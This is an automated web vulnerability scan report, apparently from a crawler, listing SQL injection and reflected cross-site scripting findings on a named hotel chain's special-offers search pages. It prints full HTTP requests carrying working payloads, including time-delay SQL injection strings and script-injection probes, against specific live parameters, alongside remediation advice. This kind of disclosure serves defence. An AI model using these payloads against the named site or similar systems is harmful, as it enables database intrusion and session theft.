Sterling Hotels, SQL Injection, CWE-89, DORK Report

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx [city parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The city parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the city parameter. The application took 110594 milliseconds to respond to the request, compared with 43140 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /sterling/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ASP.NET_SessionId=zjexnwjnvoyu4ommbyh5sz55; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 181521

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCwLh%2b%2ba4BAKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDAtSenfEBAq2FnsUI4NFiVXYYSvLI2NlHrH8o2y%2bQIx0%3d&__PREVIOUSPAGE=Px
...[SNIP]...
aXJlUG9zdEJhY2tLZXlfXxYCBSpjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJGJ0blNwZWNpYWxTZWFyY2gFKGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkYnRuRW1haWxTdWJtaXQtVqi%2b%2bbDuRFCWnheZt8xBD0i1jw%3d%3d&chkPreferences=46&city='waitfor%20delay'0%3a0%3a20'--&country=&ctl00$ContentPlaceHolder1$btnEmailSubmit=&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$hdnCity=&ctl00$ContentPlaceHolder1$hdnCountry=&ctl00$ContentPlaceHolder1$hdnPr
...[SNIP]...

Response

1.2. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx [country parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The country parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the country parameter. The application took 22016 milliseconds to respond to the request, compared with 1766 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /sterling/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 181713

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWCwLh%2b%2ba4BAKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDAtSenfEBAq2FnsUI4NFiVXYYSvLI2NlHrH8o2y%2bQIx0%3d&__PREVIOUSPAGE=
...[SNIP]...
FCWnheZt8xBD0i1jw%3d%3d&chkPreferences=syscolumns+WHERE+2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(51)%2bchar(48);WAITFOR/**/DELAY/**/@x--&city=3&country=3'waitfor%20delay'0%3a0%3a20'--&ctl00$ContentPlaceHolder1$btnEmailSubmit=netsparker%40example.com&ctl00$ContentPlaceHolder1$btnSpecialSearch=3&ctl00$ContentPlaceHolder1$hdnCity=3&ctl00$ContentPlaceHolder1$hdnCountry=3&ctl00$Content
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ia0j5v452e4gd1aa0yuqqlbx; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:34 GMT
Content-Length: 63526

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...

1.3. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx [country parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The country parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the country parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /sterling/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ASP.NET_SessionId=zjexnwjnvoyu4ommbyh5sz55; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 181521

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCwLh%2b%2ba4BAKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDAtSenfEBAq2FnsUI4NFiVXYYSvLI2NlHrH8o2y%2bQIx0%3d&__PREVIOUSPAGE=Px
...[SNIP]...
EJhY2tLZXlfXxYCBSpjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJGJ0blNwZWNpYWxTZWFyY2gFKGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkYnRuRW1haWxTdWJtaXQtVqi%2b%2bbDuRFCWnheZt8xBD0i1jw%3d%3d&chkPreferences=46&city=&country='&ctl00$ContentPlaceHolder1$btnEmailSubmit=&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$hdnCity=&ctl00$ContentPlaceHolder1$hdnCountry=&ctl00$ContentPlaceHolder1$hdnPreferences
...[SNIP]...

Response 1 (redirected)

Request 2

POST /sterling/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ASP.NET_SessionId=zjexnwjnvoyu4ommbyh5sz55; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 181521

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCwLh%2b%2ba4BAKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDAtSenfEBAq2FnsUI4NFiVXYYSvLI2NlHrH8o2y%2bQIx0%3d&__PREVIOUSPAGE=Px
...[SNIP]...
EJhY2tLZXlfXxYCBSpjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJGJ0blNwZWNpYWxTZWFyY2gFKGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkYnRuRW1haWxTdWJtaXQtVqi%2b%2bbDuRFCWnheZt8xBD0i1jw%3d%3d&chkPreferences=46&city=&country=''&ctl00$ContentPlaceHolder1$btnEmailSubmit=&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$hdnCity=&ctl00$ContentPlaceHolder1$hdnCountry=&ctl00$ContentPlaceHolder1$hdnPreferences
...[SNIP]...

Response 2

1.4. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx [state parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The state parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the state parameter. The application took 21750 milliseconds to respond to the request, compared with 1203 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /sterling/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; ASP.NET_SessionId=hcbf1efvrdp3ct45ry3y3uaw
Accept-Encoding: gzip, deflate
Content-Length: 181713

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWCwLh%2b%2ba4BAKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDAtSenfEBAq2FnsUI4NFiVXYYSvLI2NlHrH8o2y%2bQIx0%3d&__PREVIOUSPAGE=
...[SNIP]...
te=3&ctl00$ContentPlaceHolder1$hdnTotalRecs=70&ctl00$ContentPlaceHolder1$txtEmail=Your+Email+Address&currentPage=0&hotelName=Ronald+Smith&newSearch=3&selCity=3&selCountry=AC&selState=ST&spid=3&state=3'waitfor%20delay'0%3a0%3a20'--

Response

1.5. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx [country parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The country parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the country parameter. The application took 37766 milliseconds to respond to the request, compared with 6000 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /summit/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; ASP.NET_SessionId=hcbf1efvrdp3ct45ry3y3uaw
Accept-Encoding: gzip, deflate
Content-Length: 143941

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCQL%2fjIqQDgKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDWjUU89HhnZJSqRDvztEI2DzNkmE%3d&__PREVIOUSPAGE=Gs-9a-FcNvUcFPrAU2z3ay
...[SNIP]...
3BlY2lhbDAzIik7PC9zY3JpcHQ%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUqY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRidG5TcGVjaWFsU2VhcmNo5ZgvfGJ5k5Z4jQoGax8nDxg86rg%3d&chkPreferences=29&city=&country='waitfor%20delay'0%3a0%3a20'--&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$hdnCity=&ctl00$ContentPlaceHolder1$hdnCountry=&ctl00$ContentPlaceHolder1$hdnPreferences=&ctl00$ContentPlaceHolder1$hdnPropertyIds
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 151037
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 20:28:11 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...

1.6. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx [country parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

Request 1

POST /summit/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; ASP.NET_SessionId=hcbf1efvrdp3ct45ry3y3uaw
Accept-Encoding: gzip, deflate
Content-Length: 143941

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCQL%2fjIqQDgKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDWjUU89HhnZJSqRDvztEI2DzNkmE%3d&__PREVIOUSPAGE=Gs-9a-FcNvUcFPrAU2z3ay
...[SNIP]...
3BlY2lhbDAzIik7PC9zY3JpcHQ%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUqY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRidG5TcGVjaWFsU2VhcmNo5ZgvfGJ5k5Z4jQoGax8nDxg86rg%3d&chkPreferences=29&city=&country='&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$hdnCity=&ctl00$ContentPlaceHolder1$hdnCountry=&ctl00$ContentPlaceHolder1$hdnPreferences=&ctl00$ContentPlaceHolder1$hdnPropertyIds
...[SNIP]...

Response 1

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 208
Content-Type: text/html; charset=utf-8
Location: /PHG/404.htm?aspxerrorpath=/summit/special_offers/special_search_results.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 20:27:09 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fPHG%2f404.htm%3faspxerrorpath%3d%2fsummit%2fspecial_offers%2fspecial_search_results.aspx">here</a>.</h2>
</body><
...[SNIP]...

Request 2

POST /summit/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; ASP.NET_SessionId=hcbf1efvrdp3ct45ry3y3uaw
Accept-Encoding: gzip, deflate
Content-Length: 143941

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCQL%2fjIqQDgKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDWjUU89HhnZJSqRDvztEI2DzNkmE%3d&__PREVIOUSPAGE=Gs-9a-FcNvUcFPrAU2z3ay
...[SNIP]...
3BlY2lhbDAzIik7PC9zY3JpcHQ%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUqY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRidG5TcGVjaWFsU2VhcmNo5ZgvfGJ5k5Z4jQoGax8nDxg86rg%3d&chkPreferences=29&city=&country=''&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$hdnCity=&ctl00$ContentPlaceHolder1$hdnCountry=&ctl00$ContentPlaceHolder1$hdnPreferences=&ctl00$ContentPlaceHolder1$hdnPropertyIds
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 150944
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 20:27:14 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 6 instances of this issue:

/sterling/special_offers/special_search_results.aspx [city parameter]
/sterling/special_offers/special_search_results.aspx [country parameter]
/sterling/special_offers/special_search_results.aspx [state parameter]
/summit/special_offers/special_search_results.aspx [city parameter]
/summit/special_offers/special_search_results.aspx [country parameter]
/summit/special_offers/special_search_results.aspx [state parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73bd6"%3balert(1)//fec92af1d50 was submitted in the city parameter. This input was echoed as 73bd6";alert(1)//fec92af1d50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /sterling/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ASP.NET_SessionId=zjexnwjnvoyu4ommbyh5sz55; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 181521

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCwLh%2b%2ba4BAKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDAtSenfEBAq2FnsUI4NFiVXYYSvLI2NlHrH8o2y%2bQIx0%3d&__PREVIOUSPAGE=Px
...[SNIP]...
aXJlUG9zdEJhY2tLZXlfXxYCBSpjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJGJ0blNwZWNpYWxTZWFyY2gFKGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkYnRuRW1haWxTdWJtaXQtVqi%2b%2bbDuRFCWnheZt8xBD0i1jw%3d%3d&chkPreferences=46&city=73bd6"%3balert(1)//fec92af1d50&country=&ctl00$ContentPlaceHolder1$btnEmailSubmit=&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$hdnCity=&ctl00$ContentPlaceHolder1$hdnCountry=&ctl00$ContentPlaceHolder1$hdnPr
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:45:30 GMT
Content-Length: 63443

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
<window.document.forms[0].selCity.length;i++)
{
if(window.document.forms[0].selCity.options[i].text == "73bd6";alert(1)//fec92af1d50")
window.document.forms[0].selCity.selectedIndex=i;
}
//-->
...[SNIP]...

2.2. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx [country parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The value of the country request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 678af"%3balert(1)//253c63e147f was submitted in the country parameter. This input was echoed as 678af";alert(1)//253c63e147f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /sterling/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.sterlinghotels.com
Cookie: ASP.NET_SessionId=zjexnwjnvoyu4ommbyh5sz55; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 181521

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCwLh%2b%2ba4BAKClpHkBAKAq7jTDQKAua2yCgKkvJefDAKKvYyxDAKmoMGaBgLIvuxfArak%2bLUDAtSenfEBAq2FnsUI4NFiVXYYSvLI2NlHrH8o2y%2bQIx0%3d&__PREVIOUSPAGE=Px
...[SNIP]...
EJhY2tLZXlfXxYCBSpjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJGJ0blNwZWNpYWxTZWFyY2gFKGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkYnRuRW1haWxTdWJtaXQtVqi%2b%2bbDuRFCWnheZt8xBD0i1jw%3d%3d&chkPreferences=46&city=&country=678af"%3balert(1)//253c63e147f&ctl00$ContentPlaceHolder1$btnEmailSubmit=&ctl00$ContentPlaceHolder1$btnSpecialSearch=&ctl00$ContentPlaceHolder1$hdnCity=&ctl00$ContentPlaceHolder1$hdnCountry=&ctl00$ContentPlaceHolder1$hdnPreferences
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:06:22 GMT
Content-Length: 63448

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
<window.document.forms[0].selCountry.length;i++)
{
if(window.document.forms[0].selCountry.options[i].text == "678af";alert(1)//253c63e147f")
window.document.forms[0].selCountry.selectedIndex=i;
}
for (i=0;i<window.document.forms[0].selState.length;i++)
{
if(window.document.forms[0]
...[SNIP]...

2.3. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx [state parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The value of the state request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81c6a"%3balert(1)//c06c4acce6c was submitted in the state parameter. This input was echoed as 81c6a";alert(1)//c06c4acce6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

POST /sterling/special_offers/special_search_results.aspx HTTP/1.1
Referer: http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx
